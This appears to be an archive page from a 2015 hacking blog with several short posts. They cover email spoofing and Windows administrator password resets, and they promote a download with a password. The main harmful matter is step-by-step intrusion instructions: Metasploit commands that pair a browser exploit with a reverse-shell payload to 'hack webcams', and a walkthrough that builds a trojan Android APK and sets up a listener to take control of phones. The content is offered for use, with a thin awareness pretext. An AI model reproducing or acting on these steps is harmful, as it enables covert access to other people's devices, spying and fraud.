Posts

Showing posts from October, 2015

send fake email

Now You Can Send Email from Any Mail Address To Any One.  This Process is known as Email Forging and Email Spoofing. . *Emkei http://emkei.cz/

Hack Webcam

Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and take security yourself. Open Metasploit and run following commands: msf> show exploits msf>use windows/browser/adobe_cooltype_sing msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp payload=> windows/meterpreter/reverse_tcp msf exploit(adobe_cooltype_sing) > show options Module options (exploit/windows/browser/adobe_cooltype_sing): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) UR

Learn to hack linux

Image
Attack servers, crack passwords, exploit services, beat encryption - everything you need to protect yourself from evil. There are two rules of computer security: one – don’t buy a computer; and two – if you have to buy a computer, don’t turn it on. If you break these rules then you’ll be opening yourself up to potential problems. No system is 100% safe from hackers, but by following a few simple steps you can make yours much harder for intruders to attack. Hacking is the art of gaining access to a computer system that you’re not supposed to access. Its practitioners exploit bugs and glitches in software to make it perform in ways it’s not supposed to. We’ll look at two ways in which they do this, and show you how to stop yourself from becoming a victim. We’ll gain root access to a system that will enable us to do anything we wish – from stealing information to wiping the hard drives. The attacks are real and performed on actual Linux systems (though in one case we use an

Hack the Administrator Password in Windows

Hack the Administrator Password in Windows Almost everyone who is interested in  Learning Hacking  wants to learn to hack the Administrator Password. Infact this is the first thing they want to learn in hacking. As it is said, learning begins from home only, same is the case with hacking  In this post I will tell you guyz how to reset Windows administrator password (for Win 2000, XP, Vistaand Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the passwordAll of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called   Offline NT Password & Reg

subway surfers for pc is here

Image
<< Download here >> << DOWNLOAD HERE >> password is here: - cleaverfox@hackeraj <<COMMENT FAST>>

How to See When Someone Unfriends You on Facebook

Image
How to See When Someone Unfriends You on Facebook Would you like to know when someone “unfriends” you on Facebook ? There’s not a native way to see this information, and unless you keep a very close eye on your friend list, it’s likely when your friend count goes down, you aren’t sure who went missing. We have found a simple script that works with Firefox, Google Chrome, Opera and Safari that notifies you when someone on Facebook unfriends you, alerts you when someone you’re friends with deactivates their profile, and helps keep track of your friend requests. If you’re interested in adding this functionality to your Facebook account, then take a look through the gallery for more information. We’ve tried and tested it for Chrome and Firefox and recommend giving it a go.

CHANGE FACEBOOK LOGIN BACKGROUND QUICKLY & FREE USING GOOGLE CHROME Social

Image
CHANGE FACEBOOK LOGIN BACKGROUND QUICKLY & FREE USING GOOGLE CHROME CHANGE FACEBOOK LOGIN BACKGROUND: Before, Change Facebook Login Background Let me tell you can use & follow the simple method to Change Facebook Login Background. This is not really difficult you need to download the following chrome extension. 1)  You Need To Download, First of all, Go to  FACE BOOB Refresh  Chrome Extension. 2)  Go to the download link, & Click FREE, then confirm by clicking Add button. 3)  After adding the plugin to Google Chrome, visit chrome://chrome/extensions/ to access all Chrome extension settings. 4)  currently scroll down till you discover the put in extension (FB Refresh), then Click choices slightly below it. 5)  When you click Options, you will be redirected to settings page of FB Refresh. 6)  Under Image (uniform resource locator) URL/Upload section you can paste the Image URL that you can find on Google  Image Search  or simply Upload an  imag

How to Hack Android Using Kali Linux

Image
How to Hack Android Using Kali Linux Hi, How to Hack Android Using Kali Linux. This is a tutorial explaining how to hack android phones with Kali.   Step 1: Fire-Up Kali: Open a terminal, and make a  Trojan  .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk  (replace LHOST with your own IP) You can also hack android on  WAN i.e. through Interet  by using your Public/External IP  in the LHOST and by  port forwarding  (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing :  msfconsole Step 3: Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing :  set payload android/meterpreter/reverse_tcp To set L host type :  set LHOST 192.168.0.